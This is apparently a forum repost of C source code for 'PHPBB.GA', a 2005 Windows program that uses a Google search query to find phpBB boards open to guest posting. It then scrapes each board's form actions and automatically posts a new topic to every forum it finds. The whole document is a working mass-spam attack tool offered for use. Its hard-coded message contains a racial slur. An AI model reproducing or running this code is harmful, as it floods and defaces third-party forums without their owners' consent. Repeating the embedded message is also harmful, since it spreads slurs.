文章作者:Dr_aMado
复制内容到剪贴板
代码:
//
// PHPBB.GA
// phpbb.google attack
//
// Create a new topic in all forums
// with guest priveleges
//
// by Dr_aMado
// release jan 19 05
//
// triviasecurity.net
//
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#define MAX_G_LINKS 24 // urls to fetch from each google query
#pragma comment(lib, "ws2_32.lib")
typedef struct g_Result
{
char *url;
char *action;
} g_Result;
typedef struct sg_Results
{
g_Result urls[MAX_G_LINKS];
int index;
int start;
} g_Results;
bool addr_connect(PSOCKADDR_IN ss, SOCKET *socket);
char *getAttVal(SOCKET s, char *b_1024);
bool waitfor(SOCKET s, char c);
void g_Spider(SOCKET s, g_Results *b);
bool p_Spider(SOCKET s, char *a_512);
bool a_getUrl(SOCKET s, g_Results *b);
bool isTag(SOCKET s, char *h, bool with_attributes);
char recvBlanks(SOCKET s);
char *f_PostToForms(g_Result *r);
char *remAmps(char *action);
g_Results *SearchGoogle(char *searchq, g_Results *b);
int forum_from_url(char *url);
void p_newTopic(char *username, char *topic, char *message, int forum_id, char *action, char *host, char *useragent, char *referer);
char *make_action(char *a_512, char *absolute, char *action);
// action, host, useragent, referer, content-length, post_vars
char HTTP_POST[] = "POST %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\nReferer: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s";
// username, subject, message, f_id
char HTTP_POST_VARS[] = "username=%s&subject=%s&addbbcode18=orange&addbbcode20=12&helpbox=Close+all+open+bbCode+tags&message=%s&mode=newtopic&f=%d&post=Submit";
char google[] = "[url]www.google.com[/url]";
char google_get[] = "/search?q=%s&start=%d";
char search[] = "%22post+a+new+topic+%22+%22message+body%22+%2Bphpbb";
char agent[] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
char get_httpv_host_ua[] = "GET %s HTTP/1.%d\r\nHost: %s\r\nUser-Agent: %s\r\nAccept: */*\r\n\r\n";
char match[] = "<!--m-->"; // **not necessary
// Message should probably be url-encoded
char Mado_Msg[] = "%0D%0A%5Bb%5Dgreetings+to+all+my+niggas+at+triviasecurity%5B%2Fb%5D%0D%0AIM+RICK+JAMES%21%21%0D%0A%0D%0A%2DaMado";
g_Results google_results;
int main()
{
//
srand(GetTickCount());
WSADATA wd;
WSAStartup(MAKEWORD(1,0), &wd);
//exit(0);
// google displays < 1000 matches ..right?
// *.start *10
google_results.start = rand()%100;
while(google_results.start < 100)
{
if(SearchGoogle(search, &google_results) != NULL)
for(int i=0;i<google_results.index;i++)
{
f_PostToForms(&google_results.urls[i]);
free(google_results.urls[i].url);
free(google_results.urls[i].action);
}
google_results.start++;
}
WSACleanup();
return 1;
}
char recvBlanks(SOCKET s)
{
char t = ' ';
while(isspace(t)) recv(s, &t, 1, 0);
return t;
}
bool hasAttribute(SOCKET s, char *att)
{
char t = recvBlanks(s);
char a[128];
memset(a, 0, 128);
int x = 0;
while(t != '>' && x < 127)
{
if(t == '=') // end of attribute name
{
a[x] = '\0';
if(strcmp(a, att) ==0)
{
return true;
}else{ // not the attribute we're looking for, find next attribute name
memset(a, 0, 128);
x = 0;
}
}
a[x] = toupper(t);
t = recvBlanks(s);
x++;
}
return false;
}
char *getAttVal(SOCKET s, char *b_1024)
{
char t = recvBlanks(s);
int x = 0;
char delim;
if(t == '"' || t == '\'')
{
delim = t;
while(x < 1023)
{
recv(s, &t, 1, 0);
if(t != delim)
{
b_1024[x] = t;
x++;
}else
{
// we're done copying, receive till end of tag
while(recvBlanks(s) != '>');
break;
}
}
}else
{
for(x = 0; x < 1023 && !isspace(t) && t != '>'; x++)
{
b_1024[x] = t;
recv(s, &t, 1, 0);
}
if(t != '>')
{
// recv till end of tag
while(recvBlanks(s) != '>');
}
}
return b_1024;
}
bool isTag(SOCKET s, char *h, bool with_attributes)
{
char w[32];
memset(w, 0, 32);
char t = recvBlanks(s); //append --------.
for(int c=0;c<20 && !isspace(t); c++) // |
{ // |
w[c] = (char)toupper(t); //<-here-'
recv(s, &t, 1, 0);
if(t == '>') break;
}
// if t == '>' that means the tag does not have attributes
bool has_attributes = with_attributes ? (t != '>') : (t == '>');
return (has_attributes && strcmp(w, h) == 0);
}
void g_Spider(SOCKET s, g_Results *b)
{
char url[1024];
memset(url, 0, 1024);
if(isTag(s, "A", true))
{
if(hasAttribute(s, "HREF"))
{
if(b->index < MAX_G_LINKS)
{
int len = strlen(getAttVal(s, url));
b->urls[b->index].url = (char*)malloc(len+1);
memset(b->urls[b->index].url, 0, len+1);
strncpy(b->urls[b->index].url, url, len);
b->index++;
}
}
}
// t = space
}
bool addr_connect(PSOCKADDR_IN ss, SOCKET *socket_a, char *hostname)
{
struct hostent *sHost = gethostbyname(hostname);
if(sHost == NULL) return false;
ss->sin_family = AF_INET;
ss->sin_port = htons(80);
ss->sin_addr.s_addr = *((u_long*)sHost->h_addr_list[0]);
*socket_a = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
return (connect(*socket_a, (SOCKADDR*)ss, sizeof(SOCKADDR_IN)) == 0);
}
bool p_Spider(SOCKET s, char **a)
{
char p[1024];
memset(p, 0, 1024);
if(isTag(s, "FORM", true))
{
if(hasAttribute(s, "ACTION"))
{
int len = strlen(getAttVal(s, p));
*a = (char*)malloc(len+1);
memset(*a, 0, len+1);
strncpy(*a, p, len);
return true;
}
}
return false;
}
char *f_PostToForms(g_Result *r)
{
// http:// len(7)
SOCKET s;
SOCKADDR_IN a;
int i;
char *get = r->url+7;
char hostname[64];
char req[512];
memset(hostname, 0, 64);
for(i=0;get[i] != '/' && i<63;i++) hostname[i] = get[i];
get += i;
if(strstr(hostname, google+4) != NULL) return NULL;
if(!addr_connect(&a, &s, hostname)) return NULL;
sprintf(req, get_httpv_host_ua, get, 0, hostname, agent);
send(s, req, strlen(req), 0);
while(recv(s, req, 1, 0) > 0)
{
if(req[0] == '<')
{
if(p_Spider(s, &r->action))
{
//POST HERE :POST TO EVERY FORM IN PAGE
memset(req, 0, 512);
p_newTopic("Dr_aMado", "GPHPBB_Poster", Mado_Msg, forum_from_url(r->url), make_action(req, get, remAmps(r->action)), hostname, agent, r->url);
}
}
}
closesocket(s);
return r->action;
}
char *make_action(char *a_512, char *absolute, char *action)
{
int len = strlen(absolute);
char r;
for(int a=len;a>=0;a--)
{
if(absolute[a] == '/')
{
r = absolute[a+1];
absolute[a+1] = '\0';
strncpy(a_512, absolute, 511);
strncat(a_512, action, 511-strlen(absolute));
absolute[a+1] = r;
break;
}
}
return a_512;
}
g_Results *SearchGoogle(char *searchq, g_Results *b)
{
char m[1024];
char gsearch[128];
b->index = 0;
SOCKADDR_IN a;
SOCKET s;
if(!addr_connect(&a, &s, google)) return NULL; // 0,0 :start,http/1.x
sprintf(gsearch, google_get, searchq, b->start*10);
sprintf(m, get_httpv_host_ua, gsearch, 0, google, agent);
send(s, m, strlen(m), 0);
while(recv(s, m, 1, 0) > 0)
{
if(m[0] == '<') g_Spider(s, b);
}
closesocket(s);
return b;
}
char *remAmps(char *action)
{ // for form actions containing "&"
char *p;
while((p = strstr(action, "&")) != NULL) strcpy(p+1, p+5);
return action;
}
int forum_from_url(char *url)
{
char *vars = strstr(url, "?");
char *p;
char f_id[4];
memset(f_id, 0, 4);
if(vars == NULL) return 1;
vars = strstr(vars, "f=");
if(vars == NULL) return 1;
vars +=2;
if((p = strchr(vars, '&')) == NULL)
{
return atoi(vars);
}else{
p[0] = '\0';
strncpy(f_id, vars, 3);
p[0] = '&';
return atoi(f_id);
}
}
void p_newTopic(char *username, char *topic, char *message, int forum_id, char *action, char *host, char *useragent, char *referer)
{
char POST_VARS[512];
char POST[1024];
memset(POST_VARS, 0, 512);
memset(POST, 0, 1024);
sprintf(POST_VARS, HTTP_POST_VARS, username, topic, message, forum_id);
sprintf(POST, HTTP_POST, action, host, useragent, referer, strlen(POST_VARS), POST_VARS);
//printf("%s\n", POST);
SOCKET a;
SOCKADDR_IN b;
if(!addr_connect(&b, &a, host)) return;
send(a, POST, strlen(POST), 0);
closesocket(a);
printf("Posted to: [url]http://%s%s[/url]\n\tReferer:%s\n\tForum_id:%i\n\n", host, action, referer, forum_id);
return;
} 
